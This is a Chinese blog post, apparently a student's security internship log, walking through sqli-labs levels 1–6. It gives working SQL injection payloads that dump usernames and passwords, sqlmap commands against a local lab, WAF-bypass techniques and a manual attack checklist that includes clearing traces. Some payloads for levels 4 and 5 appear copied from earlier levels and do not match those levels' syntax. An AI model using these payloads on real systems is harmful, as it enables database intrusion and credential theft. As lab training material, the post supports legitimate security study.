毕业实习-5

已于 2024-09-02 19:24:13 修改
阅读量711 收藏 20
点赞数 17
文章标签: 网络安全
于 2024-08-31 20:59:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63336188/article/details/141753933
版权

文章目录

一、总结(SQL)

1.1 SQL注入原理

SQL注入是一种攻击技术,攻击者通过在输入字段中插入恶意SQL代码,操控数据库执行未授权的操作。其原理主要是利用应用程序对用户输入的验证不足,导致恶意SQL语句被执行。

1.2 SQL注入常用函数及含义

  1. UNION SELECT: 用于合并多个SELECT语句的结果,攻击者可以利用它从其他表中获取数据。
  2. SELECT: 用于从数据库中查询数据,攻击者可以通过构造恶意的SELECT语句来获取敏感信息。
  3. OR 1=1: 通过逻辑运算符使条件始终为真,从而绕过身份验证。
  4. DROP TABLE: 用于删除数据库中的表,攻击者可以利用它破坏数据。
  5. INSERT INTO: 用于向表中插入数据,攻击者可以利用它添加恶意数据。

1.3 SQL注入防御手段

  1. 参数化查询: 使用预编译语句,确保用户输入被视为数据而非代码。
  2. 输入验证: 对用户输入进行严格的格式验证,拒绝不符合预期的数据。
  3. 最小权限原则: 数据库用户应仅具有执行必要操作的权限,限制潜在损害。
  4. 使用Web应用防火墙(WAF): 监控和过滤恶意请求,提供额外的安全层。
  5. 定期安全审计: 定期检查代码和数据库配置,发现并修复潜在漏洞。

1.4 SQL注入常用绕过WAF的方法

  1. 编码绕过: 使用URL编码、Unicode编码等方式对SQL注入 payload 进行编码,绕过WAF的检测。
  2. 注释符号: 在SQL语句中插入注释符号(如--/*...*/),使WAF无法识别完整的注入语句。
  3. 变形技术: 通过改变SQL语句的结构(如使用不同的空格、换行符)来规避WAF的规则。
  4. 使用时间延迟: 通过时间盲注(如SLEEP()函数)来测试注入是否成功,避免直接返回数据。
  5. 分段注入: 将注入 payload 分成多个部分,逐步发送,避免被WAF检测到。

通过了解SQL注入的原理、常用函数、防御手段及绕过方法,可以更好地保护应用程序和数据库的安全。

二、sqli-labs通关

2.1 lees-1

(GET-基于错误-单引号-字符串)

在这里插入图片描述

判断注入类型

首先注入正确的参数,网页回显正常

?id=1

在这里插入图片描述

单引号闭合,网页回显MYSQL报错,说明存在漏洞

?id=1'

在这里插入图片描述

将后边sql语句的内容注释掉

?id=1' --+

在这里插入图片描述

获取数据库信息

联合注入

1.先知道表格有几列,如果报错就是超过列数,如果显示正常就是没有超出列数

?id=1' order by 4--+

在这里插入图片描述

?id=1' order by 3--+

在这里插入图片描述

2.爆出显示位,就是看看表格里面那一列是在页面显示的。

?id=-1'union select 1,2,3--+

在这里插入图片描述

3.爆表

?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

在这里插入图片描述

4.爆字段名

?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

在这里插入图片描述

5.获取users和password字段中的内容

?id=-1' union select 1,2,group_concat(username ,id , password) from users--+

在这里插入图片描述

2.2 Lees -2

GET-Error based-Intiger based (基于错误的 GET 整型注入)

判断注入类型

先注入正常参数,网页回显正常的信息

?id=1

在这里插入图片描述

尝试注入单引号闭合,网页回显 MySQL 报错,说明存在注入漏洞

?id=1'

在这里插入图片描述

当我们输入单引号或者双引号可以看到报错,且报错信息看不到数字,所有我们可以猜测sql语句应该是数字型注入,数字型注入和字符型注入的区别在于我们不需要用单引号去闭合,其他操作基本相同

?id=1'--+

在这里插入图片描述

获取数据库信息

判断表有几列,使用 ORDER BY 子句进行排序,看对几列有效

?id=1 ORDER BY 3--+ 有效

在这里插入图片描述

?id=1 ORDER BY 4--+ 无回显、无效

在这里插入图片描述

即:有 3 列可用

接下来判断哪些列是我们能用的,令 id 参数的查询不到结果,然后是同 UNION 进行组合查询。网页回显了数字 2 和 3,说明第二列和第三列是我们可以用的

?id=99 UNION SELECT 1,2,3--+

在这里插入图片描述

爆数据库名,我们选择第二个位置作为显示位

?id=99 UNION SELECT 1,database(),3 --+

在这里插入图片描述

爆表名:

?id=99 UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema='security'--+

在这里插入图片描述

我们需要用的就是users表,爆users表的字段

?id=99 union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_schema='security' and table_name='users'--+

在这里插入图片描述

爆 users 表中的信息

?id=99 UNION SELECT 1,group_concat(concat_ws(':',username,password)),3 FROM security.users--+

在这里插入图片描述

2.3 Lees-3

GET-Error based-Single quotes with twist string (基于错误的 GET 单引号变形字符型注入)

判断注入类型

?id=1

在这里插入图片描述

尝试单引号闭合,网页回显 MySQL 语句报错,说明存在注入漏洞

在这里插入图片描述

根据报错信息,我们需要加一个括号闭合

?id=1')--+

在这里插入图片描述

获取数据库信息

判断表有几列

?id=1') ORDER BY 3--+ 有回显

在这里插入图片描述

?id=1') ORDER BY 4--+ 无回显

在这里插入图片描述

即:有 3 列
判断哪些列我们能用

?id=99') UNION SELECT 1,2,3--+

在这里插入图片描述

爆数据库名

?id=99') UNION SELECT 1,database(),3 --+

在这里插入图片描述

爆表明

?id=99') UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema='security'--+

在这里插入图片描述

爆 users 表的字段:

?id=99') union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_schema='security' and table_name='users'--+

在这里插入图片描述

获取目标信息
爆出 users 表中的信息

?id=99') UNION SELECT 1,group_concat(concat_ws(':',username,password)),3 FROM security.users--+

在这里插入图片描述

2.4 Lees-4

GET-Error based-Double Quotes-String(基于错误的 GET 双引号字符型注入)

判断注入类型

先输入正常的参数,网页回显正常的信息

 ?id=1

在这里插入图片描述

尝试输入单引号,网页回显正确的信息(没有发生 MySQL 语句报错)

?id=1'

在这里插入图片描述

尝试注入双引号闭合,MySQL 语句报错,说明存在注入漏洞,并且闭合符号是双引号

?id=1"

在这里插入图片描述

加上–+,注释掉后面的 SQL 语句,其他步骤与前几题操作相同

?id=1")--+

在这里插入图片描述

获取数据库信息

判断表有几列

?id=1') ORDER BY 3--+ 有回显

在这里插入图片描述

?id=1') ORDER BY 4--+ 无回显

在这里插入图片描述

即:有 3 列
判断哪些列我们能用

?id=99') UNION SELECT 1,2,3--+

在这里插入图片描述

爆数据库名

?id=99') UNION SELECT 1,database(),3 --+

在这里插入图片描述

爆表明

?id=99') UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema='security'--+

在这里插入图片描述

爆 users 表的字段:

?id=99') union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_schema='security' and table_name='users'--+

在这里插入图片描述

获取目标信息
爆出 users 表中的信息

?id=99') UNION SELECT 1,group_concat(concat_ws(':',username,password)),3 FROM security.users--+

在这里插入图片描述

2.5 Lees-5

GET-Double Injection-Single Quotes-String(双注入 GET 单引号字符型注入)

如果数据不显示只有对错页面显示我们可以选择布尔盲注。布尔盲注主要用到length(),ascii() ,substr()这三个函数,首先通过length()函数确定长度再通过另外两个确定具体字符是什么。布尔盲注向对于联合注入来说需要花费大量时间

我们输入参数?id=1进行测试:

在这里插入图片描述

可以发现页面回显和前几关完全不一样,并没有直接给我们输出某条信息,这个时候我们别慌,先找它的注入点是什么,老方法,我们输入测试语句:

?id=1' and '1'='1

页面回显如下:

在这里插入图片描述

可以看到页面回显正常。接着我们输入测试语句:

?id=1' and '1'='2

页面回显如下:
在这里插入图片描述

可以看到页面回显不正常,说明注入点大概率就是单引号,如果后续爆破语句爆破不出来的话就测试其他注入点即可。

接下来我们去猜解一下数据库中的字段数,输入语句:

?id=1' group by x --+

(x是根据情况进行输入,经过最后猜解可得字段数为3)

在这里插入图片描述
在这里插入图片描述

接下来我们尝试去看一下这一关的显示位,输入语句:

?id=-1' union select 1,2,3 --+

页面回显如下:

在这里插入图片描述

可以看到页面并没有给我们反馈出任何一个显示位,那也就是说这一关不存在显示位,一般情况下没有显示位首选报错注入(经验),当然如果报错注入不可行也可以通关其他注入方式。

爆数据库名

?id=1' union select 1,count(*),concat(0x7e,(select database()),0x7e,floor(rand(0)*2)) as a from information_schema.tables group by a --+

在这里插入图片描述

爆表名

?id=99') UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema='security'--+

在这里插入图片描述

爆 users 表的字段:

?id=99') union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_schema='security' and table_name='users'--+

在这里插入图片描述

获取目标信息

爆出 users 表中的信息

?id=99') UNION SELECT 1,group_concat(concat_ws(':',username,password)),3 FROM security.users--+

在这里插入图片描述

三、SQLi的手工注入步骤

手工SQL注入(SQL Injection,SQLi)是一种常见的网络攻击技术,攻击者通过在输入字段中插入恶意SQL代码,来操控数据库。以下是手工SQL注入的基本步骤:

  1. 信息收集

    • 确定目标网站的输入点,例如登录表单、搜索框、URL参数等。
    • 了解应用程序的数据库类型(如MySQL、PostgreSQL等)。

  2. 测试输入点

    • 在输入字段中插入简单的SQL注入测试字符串,例如 ' OR '1'='1,观察应用程序的响应。
    • 检查是否返回错误信息或意外的结果,以确认是否存在SQL注入漏洞。

  3. 识别数据库类型

    • 根据错误信息或响应行为,判断后端数据库的类型(如MySQL、SQL Server等),这将影响后续的注入策略。

  4. 获取数据库信息

    • 使用联合查询(UNION SELECT)来提取数据库中的信息,例如表名、列名等。
    • 示例:' UNION SELECT null, database(), user() --

  5. 提取数据

    • 一旦识别出表和列,可以继续构造查询以提取敏感数据,如用户凭证、个人信息等。
    • 示例:' UNION SELECT username, password FROM users --

  6. 绕过安全措施

    • 如果应用程序有防护措施(如输入过滤),可以尝试使用编码、注释或其他技巧来绕过这些限制。

  7. 执行任意SQL命令

    • 在确认注入成功后,可以执行更复杂的SQL命令,例如删除数据、修改数据等。

  8. 清理痕迹

    • 在攻击完成后,攻击者可能会尝试清理日志或其他痕迹,以避免被发现。

请注意,进行SQL注入测试必须在合法授权的情况下进行,未经授权的攻击是违法的。

四、sqlmap通关(第六关)

1.检测注入点python .\sqlmap.py -u http://127.0.0.1/Less-6/?id=1

在这里插入图片描述

2.得出所有数据库名python .\sqlmap.py -u http://127.0.0.1/Less-6/?id= --dbs

在这里插入图片描述

3.查看当前使用的数据库:python .\sqlmap.py -u http://127.0.0.1/Less-6/?id=1' --current-db

在这里插入图片描述

4.获取表python .\sqlmap.py -u http://127.0.0.1/Less-6/?id=1 -D security --tables

在这里插入图片描述

5.获取字段python .\sqlmap.py -u http://127.0.0.1/Less-6/?id=1 -D security -T users --columns

在这里插入图片描述

6.获取数据python .\sqlmap.py -u http://127.0.0.1/Less-6/?id=1 -D security -T users -C id,username,password --dump

在这里插入图片描述

青芒芒甘露
关注
java毕业实习日志_java毕业实习日记.doc
weixin_35968185的博客
02-13 3561
java毕业实习日记java毕业实习日记篇一:JAVA毕业实习日志实习日志实习日志(一)经过一天一夜的行程,终于到了这座美丽的城市——青岛。拖着疲惫的身躯走出车站的那一瞬间,迎面扑来的海水的味道,将心底的那一丝疲惫伴着海风悄然的吹走。第一次如此近距离的接触海,第一次接受海风的洗礼,我的心彷佛飘荡在那泛着层层浪花的海里。到了实训基地,我看到了久别的几个同学也是永远的同学,感到分外的高兴,每一个人都充...
java毕业设计-大学生实习管理系统 实习申请系统【附源码+文档】
qq_1445749146的博客
10-13 3660
目前,根据国家、学校的政策在校学生都要走出校门,进行工作前实习。工学结合的人才培养是学校培养人才的重要方式。让学生进入企业通过在校学习的知识与企业实际工作相结合,熟练掌握学习的知识。实习期间如何更好管理实习学生,成为一个有待解决的问题。实习是高校毕业毕业前对所学习知识的检验,是高校教育的一个重要的环节。学校学生在实习过程中即是一名在校的学生又是实习单位的临时员工,因此在这个情况下实习生管理是双重的,即受管理,又受企业按员工进行管理。
毕业实习-报告
Pandora_417的博客
05-09 1472
撰写要求:实习报告是学生实习过程与成果的总结。应围绕实习目的与要求、实习主要内容,结合理论知识与现场实际,总结实习过程中的体会和感受等。要求:重点突出,层次分明,语言流畅,结构合理,总字教不少于3000字。(具体要求详见本专业实习计划) 一、主要实习目的与要求: 由于疫情原因,故而本次进行了为期10天的线上实习实习的主要目的是使我们熟练的掌握Java基础语法及特性、熟悉J2EE基于组件的分层开发模式、JSP/Servlet组件技术基础,还有掌握数据库的基本使用。然后再在相应的基础上,小组分工合作按照公司软
成都东软毕业实习-周报规范
Marvel__Dead 胡艺宝的博客
05-07 1512
周报规范 文章结尾有彩蛋。 整体 整体要给人写得很多很规范的感觉。 删掉周报中如下内容每一篇周报注意点: 每一篇周报的毕业生总结要写得满满的。 周报内容看个人造化,写出在公司的任务、经历以及成长 指导老师批语不超过两行。 指导老师评语要与当前周所完成工作对应。 指导老师评语后面的指导老师签名及批语时间,必须加上。 指导老师评语单元格高度,一定要类似下面这个模板。 最后一篇总结注意点: 字数300
实习周记-day5
xtb666666的博客
03-07 1855
今天学习了一个云计算-私有云的一个框架,项目非常庞大,真的一开始无从下手,官方文档都是产品介绍和接口文档,完全没源码文档以及注释,网上也没教程,最后问了转正的同事,找到了突破点,api架构用rest和rabbitmq,对消息队列做了很多封装,以及队列,异步处理。今天看得不是很多,可以以后慢慢了解,明天开始产品与源码并行学习。 明日继续更新,随手笔记,看看即可。 ...
2023 hnust 湖科大 毕业实习 报告+实习鉴定表
qq_33843237的博客
09-18 350
2023 hnust 湖科大 毕业实习 报告+实习鉴定表
Java毕业设计-基于springboot开发的毕业实习与就业管理系统设计与实现-毕业论文(附毕设源代码)
分享型博主
04-18 986
Java毕业设计-基于springboot开发的毕业实习与就业管理系统设计与实现-毕业论文(附毕设源代码)。作为本科大学生,我们在学习Java编程语言的过程中,不仅掌握了其语法规则和编程技巧,更重要的是学会了如何利用Java解决实际问题,实现软件系统的设计与开发。本次毕业设计旨在通过实际项目的开发,将我们在大学期间所学的Java编程语言知识与实践相结合,进一步加深对Java语言的理解和应用。
计算机毕业实习报告范文,大学计算机专业毕业实习报告范文
weixin_32757449的博客
07-25 1694
《大学计算机专业毕业实习报告范文》由会员分享,可在线阅读,更多相关《大学计算机专业毕业实习报告范文(4页珍藏版)》请在人人文库网上搜索。1、大学计算机专业毕业实习报告范文计算机将具备更多的智能成分,它将具有多种感知能力、一定的思考与判断能力及一定的自然语言能力。 除了提供自然的输入手段 ( 如语音输入、 手写输入 ) 外,让人能产生身临其境感觉的各种交互设备已经出现,虚拟现实技术是这一领域发展的集...
Java 实习生(月薪 3k-5k 水平)应具备哪些知识、能力?给学弟学妹们支招
热门推荐
沉默王二
05-10 6万+
我 10 年前在一家外企做 Java 实习生的时候,就差不多这个水平((月薪 3k-5k),10 多年过去了,可以稍微把目标放得大一点,比如说 8k-10k,我觉得也不是不可能! 在一线城市找一份靠谱的实习工作我觉得还是不难的,怕就怕有些学弟学妹盲目乐观,以为能找一份不错的实习工作,结果碰一鼻子灰,最后心灰意冷,可能就转行了。或者盲目悲观,大四了呀,学历不咋滴呀,整天恍恍惚惚的,无心学习,最后也转行了。 注意注意,只要现在立刻马上开始按照我说的学习路线开始,就一点不晚。 第一,Intellij IDEA、G
毕业实习-实习报告+实习日志
07-14
一周实习日志包括感悟 实习报告主要内容: 1.SQL注入漏洞得到网站登陆密码 实验内容:该项目为一在线网站,请通过SQL注入漏洞得到数据库中存储的网站登陆密码,登陆该网站后台管理系统,获取key值。 2.SQL注入攻击...
毕业实习-2(信息安全)
08-28
毕业实习-2(信息安全)
毕业实习与就业-毕业实习与就业系统-毕业实习与就业系统源码-毕业实习与就业管理系统-毕业实习与就业管理系统java代码
03-29
毕业实习与就业-毕业实习与就业系统-毕业实习与就业系统源码-毕业实习与就业管理系统-毕业实习与就业管理系统java代码-毕业实习与就业系统设计与实现-基于springboot的毕业实习与就业系统-基于Web的...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8538
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
MySQL 5.7从入门到精通 第19章 MySQL Cluster 共49页.pptx
11-09
【课程大纲】 第1章 初始MySQL 共19页.pptx 第2章 MySQL的安装与配置 共14页.pptx 第3章 数据库的基本操作 共11页.pptx 第4章 数据表的基本操作 共26页.pptx 第5章 数据类型和运算符 共17页.pptx 第6章 MySQL函数 共76页.pptx 第7章 查询数据 共48页.pptx 第8章 插入、更新与删除数据 共10页.pptx 第9章 索引 共11页.pptx 第10章 存储过程和函数 共19页.pptx 第11章 视图 共20页.pptx 第12章 触发器 共11页.pptx 第13章 用户管理 共25页.pptx 第14章 数据备份与还原 共21页.pptx 第15章 MySQL日志 共22页.pptx 第16章 性能优化 共18页.pptx 第17章 MySQL Workbench5.2 的使用 共15页.pptx 第18章 MySQL Replication 共27页.pptx 第19章 MySQL Cluster 共49页.pptx 第20章 MySQL管理利器——MySQL Utilities 共5页.pptx 第21章 读写分离的利器——MySQL Proxy 共5页.pptx 第22章 PHP操作MySQL数据库 共7页.pptx 第23章 新闻发布系统数据库设计 共6页.pptx 第24章 论坛管理系统数据库设计 共6页.pptx
python模拟飞机选座的完整代码
11-09
python模拟飞机选座的完整代码
在线图书管理.zip
11-09
基于springboot的毕业设计源码
C++实现数据结构作业-rbtreezip.zip
最新发布
11-09
C++实现数据结构作业-rbtreezip.zip
高分springboot毕设+vue零食批发商仓库管理系统-Java源码.zip
11-09
本项目是一个基于Spring Boot和Vue.js技术栈的零食批发商仓库管理系统,旨在为计算机相关专业的学生提供一个完整的毕业设计案例,同时也为Java学习者提供一个实战练习的平台。系统集成了仓库管理、商品管理、订单处理、用户权限控制等多种功能,能够帮助零食批发商高效地管理库存、处理订单,并优化仓库运营流程。 在技术实现上,后端采用Spring Boot框架,利用其快速开发和部署的特点,结合Spring Data JPA和Hibernate实现数据持久化,确保数据的安全性和一致性。前端则采用Vue.js框架,通过组件化开发和单页面应用(SPA)的设计模式,提供流畅的用户体验。系统还集成了Element UI组件库,进一步提升了界面的美观性和交互性。 此外,项目还包括了用户认证和权限管理模块,确保系统的安全性和数据的保密性。通过这个项目,学生不仅可以学习到Java后端开发和Vue.js前端开发的实战技能,还能理解企业级应用开发的流程和规范。
java毕业设计-实习管理系统源码
09-10
实习管理系统是一个用于管理学生实习的软件系统。这个系统可以帮助学生和学校更好地管理实习过程,提高实习的效果和质量。 这个系统的主要功能包括学生信息管理、实习单位管理、实习任务管理和实习成绩管理等。 学生信息管理模块可以记录学生的基本信息,包括姓名、学号、专业等,方便学校和实习单位进行学生信息的查找和管理。 实习单位管理模块可以记录实习单位的基本信息,包括单位名称、联系方式等,方便学生和学校进行实习单位的选择和管理。 实习任务管理模块可以记录每个学生的实习任务,包括实习内容、实习时间等,方便学校安排实习任务和学生了解实习的具体要求。 实习成绩管理模块可以记录学生的实习成绩,包括实习报告、实习考核等,方便学校对学生实习成绩进行评估和统计。 系统的源码包括了上述功能的实现代码,可以帮助开发者了解和学习如何使用Java编程语言来实现一个实习管理系统。同时,开发者也可以根据自己的需要对源码进行修改和扩展,以满足不同学校的实习管理需求。 总的来说,这个毕业设计的实习管理系统源码对于对Java编程感兴趣的学生来说是一个有价值的学习资料,也是一个实用的工具,可以帮助学校和学生更好地管理实习过程。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值